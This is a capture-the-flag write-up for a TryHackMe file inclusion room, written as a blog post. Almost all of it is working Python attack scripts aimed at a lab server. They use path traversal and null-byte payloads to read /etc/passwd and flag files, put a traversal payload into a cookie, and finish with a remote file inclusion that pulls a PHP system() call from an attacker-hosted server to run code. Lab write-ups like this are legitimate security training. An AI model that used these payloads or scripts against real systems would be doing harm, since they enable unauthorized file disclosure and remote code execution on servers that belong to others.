TryHackMe — File Inclusion (Using python)

Link: https://tryhackme.com/room/fileinc

Link: https://tryhackme.com/room/fileinc

This room introduces file inclusion vulnerabilities, including Local File Inclusion (LFI), Remote File Inclusion (RFI), and directory traversal.

I have solved all the challenges using python. So, feel free to run the code and check if it is successful for you as well.

Task 1 Introduction

Task 2 Deploy the VM

Task 3 Path Traversal

Task 4 Local File Inclusion — LFI

Lab #1

  • Use the code below to get the flag
import requests 
import re 
pattern = re.compile(rb"<code>(.*?)</code>", re.DOTALL) 
 
def LFI(url, parameter): 
    payload = '' 
    response = requests.get(f"{url}?{parameter}={payload}") 
    if response.status_code == 200 and b"Warning" in response.content and b"include()" in response.content: 
        print("*** Found LFI***") 
        payload = '/etc/passwd' 
        response = requests.get(f"{url}?{parameter}={payload}") 
        data = (response.content) 
        matches = pattern.findall(data) 
        print(matches[1].decode("utf-8")) 
 
 
def main(): 
    ip = '10.10.72.183' 
    url = 'http://'+ip+'/' 
    response = requests.get(url) 
    url = url + 'lab1.php' 
    parameter = 'file' 
    if response.status_code == 200: 
        LFI(url,parameter) 
    else: 
        print("Error, check the URL") 
 
 
if __name__ == "__main__": 
    main()

Lab #2

import requests 
import re 
pattern = re.compile(rb"include\((.*?)/&quot;",re.DOTALL) 
 
def LFI(url, parameter): 
    payload = '' 
    response = requests.get(f"{url}?{parameter}={payload}") 
    if response.status_code == 200 and b"Warning" in response.content and b"include()" in response.content: 
        print("*** Found Folder***") 
        payload = '"' 
        response = requests.get(f"{url}?{parameter}={payload}") 
        data = (response.content) 
        matches = pattern.findall(data) 
        print(matches[0].decode("utf-8")) 
 
 
def main(): 
    ip = '10.10.72.183' 
    url = 'http://'+ip+'/' 
    response = requests.get(url) 
    url = url + 'lab2.php' 
    parameter = 'file' 
    if response.status_code == 200: 
        LFI(url,parameter) 
    else: 
        print("Error, check the URL") 
 
 
if __name__ == "__main__": 
    main()

Task 5 Local File Inclusion — LFI #2

Lab #3

import requests 
import re 
pattern = re.compile(rb"<code>(.*?)</code>", re.DOTALL) 
 
def LFI(url, parameter): 
    payload = '' 
    response = requests.get(f"{url}?{parameter}={payload}") 
    if response.status_code == 200 and b"Warning" in response.content and b"include()" in response.content: 
        print("*** Found LFI***") 
        payload = '../../../../etc/passwd%00' 
        response = requests.get(f"{url}?{parameter}={payload}") 
        data = (response.content) 
        matches = pattern.findall(data) 
        print(matches[1].decode("utf-8")) 
 
 
def main(): 
    ip = '10.10.72.183' 
    url = 'http://'+ip+'/' 
    response = requests.get(url) 
    url = url + 'lab3.php' 
    parameter = 'file' 
    if response.status_code == 200: 
        LFI(url,parameter) 
    else: 
        print("Error, check the URL") 
 
 
if __name__ == "__main__": 
    main()

Lab #4

import requests 
 
def LFI(url, parameter): 
    payload = '' 
    response = requests.get(f"{url}?{parameter}={payload}") 
    if response.status_code == 200 and b"file_get_contents" in response.content: 
        print("*** Found Function***") 
        print("file_get_contents") 
 
 
def main(): 
    ip = '10.10.72.183' 
    url = 'http://'+ip+'/' 
    response = requests.get(url) 
    url = url + 'lab4.php' 
    parameter = 'file' 
    if response.status_code == 200: 
        LFI(url,parameter) 
    else: 
        print("Error, check the URL") 
 
 
if __name__ == "__main__": 
    main()

Lab #5

import requests 
import re 
pattern = re.compile(rb"<code>(.*?)</code>", re.DOTALL) 
 
def LFI(url, parameter): 
    payload = '' 
    response = requests.get(f"{url}?{parameter}={payload}") 
    if response.status_code == 200 and b"Warning" in response.content and b"include()" in response.content: 
        print("*** Found LFI***") 
        payload = '....//....//....//....//etc/passwd' 
        response = requests.get(f"{url}?{parameter}={payload}") 
        data = (response.content) 
        matches = pattern.findall(data) 
        print(matches[1].decode("utf-8")) 
 
 
def main(): 
    ip = '10.10.72.183' 
    url = 'http://'+ip+'/' 
    response = requests.get(url) 
    url = url + 'lab5.php' 
    parameter = 'file' 
    if response.status_code == 200: 
        LFI(url,parameter) 
    else: 
        print("Error, check the URL") 
 
 
if __name__ == "__main__": 
    main()

Lab #6

import requests 
import re 
pattern = re.compile(rb"<code>(.*?)</code>", re.DOTALL) 
 
def LFI(url, parameter): 
    payload = '' 
    response = requests.get(f"{url}?{parameter}={payload}") 
    if response.status_code == 200 and b"Access Denied" in response.content: 
        print("*** Found LFI***") 
        payload = 'THM-profile/../../../../etc/os-release' 
        response = requests.get(f"{url}?{parameter}={payload}") 
        data = (response.content) 
        matches = pattern.findall(data) 
        print(matches[1].decode("utf-8")) 
 
 
def main(): 
    ip = '10.10.72.183' 
    url = 'http://'+ip+'/' 
    response = requests.get(url) 
    url = url + 'lab6.php' 
    parameter = 'file' 
    if response.status_code == 200: 
        LFI(url,parameter) 
    else: 
        print("Error, check the URL") 
 
 
if __name__ == "__main__": 
    main()

Task 6 Remote File Inclusion — RFI

Task 7 Remediation

Task 8 Challenge

flag1

import requests 
import re 
pattern = re.compile(rb"<code>(.*?)</code>", re.DOTALL) 
 
def main(): 
    url = 'http://10.10.72.183/challenges/chall1.php' 
    data = {"file":"/etc/flag1"} 
    response = requests.post(url, data) 
    data = (response.content) 
    matches = pattern.findall(data) 
    print(matches[1].decode("utf-8")) 
 
if __name__ == '__main__': 
    main()

flag2

import requests 
import re 
pattern = re.compile(rb"<code>.*</div>(.*?)</code>", re.DOTALL) 
 
def main(): 
    url = 'http://10.10.72.183/challenges/chall2.php' 
    cookie = {"THM":"../../../../etc/flag2%00"} 
    response = requests.get(url, cookies=cookie) 
    data = (response.content) 
    matches = pattern.findall(data) 
    print(matches[0].decode("utf-8")) 
 
if __name__ == '__main__': 
    main()

flag3

import requests 
import re 
pattern = re.compile(rb"<code>(.*?)</code>", re.DOTALL) 
 
def main(): 
    url = 'http://10.10.72.183/challenges/chall3.php' 
    data = {"file":"../../../../etc/flag3\x00"} 
    response = requests.post(url, data) 
    data = (response.content) 
    matches = pattern.findall(data) 
    print(matches[1].decode("utf-8")) 
 
if __name__ == '__main__': 
    main()

RCE

rce.txt

<?PHP 
    echo system('hostname') 
?>

rce.py

import requests 
import re 
pattern = re.compile(rb"<code>(.*?)</code>", re.DOTALL) 
 
def main(): 
    url = 'http://10.10.72.183/playground.php?file=http://10.13.22.219:8000/rce.txt' 
    response = requests.get(url) 
    data = (response.content) 
    matches = pattern.findall(data) 
    print(matches[1].decode("utf-8")) 
 
if __name__ == '__main__': 
    main()

Hay Yay!!!

Please give me a clap if you found it to be helpful and follow me to get more Security knowledge.